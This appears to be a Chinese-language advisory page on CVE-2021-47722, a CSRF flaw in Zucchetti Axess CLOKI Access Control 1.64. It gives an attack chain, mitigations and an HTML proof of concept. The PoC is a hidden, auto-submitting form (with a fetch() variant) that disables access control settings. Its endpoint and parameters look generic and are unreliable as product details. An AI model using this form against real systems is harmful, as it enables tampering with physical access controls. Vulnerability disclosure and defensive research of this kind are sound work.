CVE-2021-47722 Zucchetti Axess CLOKI Access Control跨站请求伪造漏洞

漏洞信息

漏洞编号

CVE-2021-47722

漏洞类型

跨站请求伪造(CSRF)

CVSS评分

3.5 低危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Zucchetti Axess CLOKI Access Control

漏洞概述

CVE-2021-47722是Zucchetti Axess CLOKI Access Control 1.64版本中存在的一个跨站请求伪造(Cross-Site Request Forgery, CSRF)安全漏洞。该漏洞源于应用程序未能对重要操作实施足够的CSRF防护机制，允许攻击者通过诱导已认证用户访问恶意网页，在用户不知情的情况下执行未授权的操作。攻击者可以构造隐藏的HTML表单或恶意链接，利用受害者的有效会话信息，伪装成合法请求来修改访问控制设置，包括禁用或调整安全参数。此漏洞的CVSS 3.1评分仅为3.5，属于低危级别，主要因为其利用需要用户交互且攻击者仅能影响低权限操作。尽管如此，该漏洞仍可能被恶意利用来破坏系统的访问控制策略，导致未授权访问或权限提升风险。建议受影响的用户尽快采取修复措施或实施临时缓解方案。

技术细节

该CSRF漏洞存在于Zucchetti Axess CLOKI Access Control的访问控制管理功能中。漏洞的根本原因是应用程序在处理访问控制设置变更请求时缺少必要的CSRF Token验证或Referer检查机制。攻击者可以利用此漏洞构造恶意网页，当已认证的管理员或用户访问该页面时，浏览器会自动向目标应用程序发送携带有效会话Cookie的请求。由于应用程序无法区分合法用户操作和攻击者伪造的请求，攻击者可以成功执行以下操作：1) 禁用访问控制规则；2) 修改访问权限级别；3) 添加或删除用户访问权限；4) 变更安全策略配置。攻击者通常会使用隐藏的iframe或自动提交的表单来隐藏恶意请求，利用HTML的自动提交机制在用户无感知的情况下完成攻击。攻击者需要诱骗受害者访问恶意页面，且受害者需要在目标应用上保持活跃会话。防御措施包括：实现CSRF Token机制、验证请求来源(Referer/Origin头)、使用SameSite Cookie属性，以及对重要操作实施额外的确认机制。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者通过侦察获取目标Zucchetti Axess CLOKI系统的版本信息和可用的API端点，确认目标版本存在CSRF漏洞

STEP 2

步骤2: 构造恶意页面

攻击者创建包含隐藏表单或JavaScript代码的恶意网页，表单中包含修改访问控制设置的请求参数

STEP 3

步骤3: 社会工程学攻击

攻击者通过钓鱼邮件、即时通讯或恶意链接等方式诱导已认证的管理员或用户访问恶意页面

STEP 4

步骤4: 自动发送恶意请求

当受害者访问恶意页面时，浏览器自动向目标服务器发送携带有效Session Cookie的POST请求

STEP 5

步骤5: 执行未授权操作

服务器无法识别伪造请求，执行攻击者指定的访问控制修改操作，如禁用安全策略或变更权限

STEP 6

步骤6: 权限滥用

攻击者利用被篡改的访问控制设置进行后续攻击，可能导致未授权访问、数据泄露或进一步入侵

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CSRF PoC for CVE-2021-47722 - Zucchetti Axess CLOKI Access Control -->
<!-- This PoC demonstrates how an attacker can manipulate access control settings -->
<!DOCTYPE html>
<html>
<head>
    <title>Access Control Settings Update</title>
</head>
<body>
    <h1>Page Loading...</h1>
    <!-- Hidden form to modify access control settings -->
    <form id="csrfForm" action="https://target-server/axess-cloki/api/access-control/update" method="POST" style="display:none;">
        <!-- Disable access control -->
        <input type="hidden" name="access_control_enabled" value="false">
        <input type="hidden" name="security_level" value="0">
        <input type="hidden" name="action" value="disable_protection">
        <!-- CSRF Token (if implementation exists) - placeholder -->
        <input type="hidden" name="csrf_token" value="attacker_controlled_or_empty">
    </form>

    <script>
        // Auto-submit the form when page loads
        document.getElementById('csrfForm').submit();
        
        // Alternative: Use fetch API for more stealthy attack
        /*
        fetch('https://target-server/axess-cloki/api/access-control/update', {
            method: 'POST',
            mode: 'no-cors',
            credentials: 'include',
            headers: {
                'Content-Type': 'application/x-www-form-urlencoded',
            },
            body: 'access_control_enabled=false&security_level=0&action=disable_protection'
        });
        */
    </script>
    
    <p>If you see this message, the attack may have failed.</p>
</body>
</html>

影响范围

Zucchetti Axess CLOKI Access Control 1.64

可能影响更低版本

防御指南

临时缓解措施

临时缓解措施包括：1) 在Web应用防火墙(WAF)上配置规则，验证CSRF Token或检查Referer头；2) 启用浏览器的同源策略保护；3) 提醒用户不要点击未知来源的链接；4) 定期清理会话并设置较短的会话超时时间；5) 监控异常访问控制修改行为；6) 考虑临时禁用访问控制管理功能的远程访问，仅允许通过内网管理控制台操作。